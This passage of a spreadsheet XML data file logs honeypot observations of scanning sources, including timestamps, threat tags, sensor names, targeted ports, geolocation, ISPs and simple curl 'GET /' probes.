    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;23630&amp;&amp;39394"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc84:3ea7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3353"/>
    <x v="3353"/>
    <s v="125-228-32-47.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:22:48"/>
    <d v="2024-09-11T22:17:00"/>
    <d v="2025-04-03T10:22:48"/>
    <n v="250"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;64492&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:202f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3354"/>
    <x v="3354"/>
    <s v="NA&amp;&amp;59-126-119-22.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T10:22:34"/>
    <d v="2024-05-07T21:20:00"/>
    <d v="2025-04-03T10:22:34"/>
    <n v="776"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;56942&amp;&amp;80&amp;&amp;48367&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:7716"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3355"/>
    <x v="3355"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:21:46"/>
    <d v="2025-04-03T10:19:47"/>
    <d v="2025-04-03T10:21:46"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4595"/>
    <s v="77.0266"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ad7:9f0a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3356"/>
    <x v="3356"/>
    <s v="114-33-38-40.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:20:59"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T10:20:59"/>
    <n v="495"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="80&amp;&amp;53&amp;&amp;30451&amp;&amp;23&amp;&amp;9100&amp;&amp;5554"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1469"/>
    <s v="120.684"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:2628"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3357"/>
    <x v="3357"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:19:59"/>
    <d v="2025-04-03T10:19:59"/>
    <d v="2025-04-03T10:19:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:21a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3358"/>
    <x v="3358"/>
    <s v="NA&amp;&amp;125-228-28-243.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T10:14:58"/>
    <d v="2024-09-09T22:44:00"/>
    <d v="2025-04-03T10:14:58"/>
    <n v="405"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;58370&amp;&amp;58381&amp;&amp;59628&amp;&amp;12652&amp;&amp;80&amp;&amp;NA"/>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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:1cf3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3359"/>
    <x v="3359"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:58:19"/>
    <d v="2023-12-01T06:54:00"/>
    <d v="2025-04-03T09:58:19"/>
    <n v="179"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;29945"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RJ"/>
    <s v="Rio de Janeiro"/>
    <s v="Seropédica"/>
    <s v="Universidade Rural"/>
    <s v="3480652"/>
    <s v="NA"/>
    <s v="-22.7664"/>
    <s v="-43.6914"/>
    <s v="267296"/>
    <s v="Lopez Santos Sat Nit Telecomunicacoes LTDA"/>
    <s v="Lopez Santos Sat Nit Telecomunicacoes LTDA"/>
    <s v="business"/>
    <s v="Lopez Santos Sat Nit Telecomunicacoes LTDA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de9:4d31"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3360"/>
    <x v="3360"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:55:49"/>
    <d v="2025-04-03T09:55:49"/>
    <d v="2025-04-03T09:55:49"/>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f:a117"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3361"/>
    <x v="3361"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:54:20"/>
    <d v="2025-03-27T06:49:23"/>
    <d v="2025-04-03T09:54:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AM"/>
    <s v="Armenia"/>
    <s v="ER"/>
    <s v="Yerevan"/>
    <s v="NA"/>
    <s v="Yerevan (Kentron District)"/>
    <s v="616052"/>
    <s v="NA"/>
    <s v="40.1772"/>
    <s v="44.526"/>
    <s v="44395"/>
    <s v="Ucom CJSC"/>
    <s v="Ucom CJSC"/>
    <s v="business"/>
    <s v="Ucom Gpon"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25fc:4f18"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3362"/>
    <x v="3362"/>
    <s v="220-133-175-72.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:50:15"/>
    <d v="2024-12-25T06:06:37"/>
    <d v="2025-04-03T09:50:15"/>
    <n v="334"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;49019&amp;&amp;31880&amp;&amp;48997&amp;&amp;4803&amp;&amp;36390&amp;&amp;80"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:af48"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3363"/>
    <x v="3363"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:50:11"/>
    <d v="2025-03-19T13:39:08"/>
    <d v="2025-04-03T09:50:11"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Bandung"/>
    <s v="Bandung"/>
    <s v="1650357"/>
    <s v="NA"/>
    <s v="-6.92067"/>
    <s v="107.601"/>
    <s v="150210"/>
    <s v="PT Wadma Berkah Sedaya"/>
    <s v="PT Wadma Berkah Sedaya"/>
    <s v="business"/>
    <s v="PT Wadma Berkah Sedaya"/>
    <s v="None"/>
    <s v="IDNIC-WBS-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:670a:4733"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3364"/>
    <x v="3364"/>
    <s v="123-205-121-86.adsl.dynamic.seed.net.tw&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:48:48"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T09:48:48"/>
    <n v="560"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H6"/>
